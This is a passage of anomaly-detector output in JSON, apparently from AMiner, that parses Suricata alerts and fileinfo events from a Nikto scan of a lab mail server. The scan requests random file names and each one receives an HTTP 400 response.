"\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46830, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2009838519995892,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2009838519995892, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.217384+0000\",\"flow_id\":2009838519995892,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46830,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.LOG\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.LOG\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.218957 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46832 -> 192.168.10.154:80", "/parser/model/time": 1583349514.218957, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46832, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.218957 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46832 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.box", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.219129+0000\",\"flow_id\":1576347470812328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.219129, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1576347470812328,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.box\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.box\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.box", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.box", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46832, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1576347470812328,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1576347470812328, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.219129+0000\",\"flow_id\":1576347470812328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.220670 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46834 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22067, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46834, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.220670 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46834 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cgi+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.220821+0000\",\"flow_id\":1821920815897391,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.220821, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1821920815897391,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cgi+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cgi+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cgi+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cgi+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46834, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1821920815897391,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1821920815897391, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.220821+0000\",\"flow_id\":1821920815897391,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.222374 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46836 -> 192.168.10.154:80", "/parser/model/time": 1583349514.222374, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46836, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.222374 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46836 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.no", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.222542+0000\",\"flow_id\":770079030141252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.222542, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":770079030141252,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.no\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.no\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.no", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", 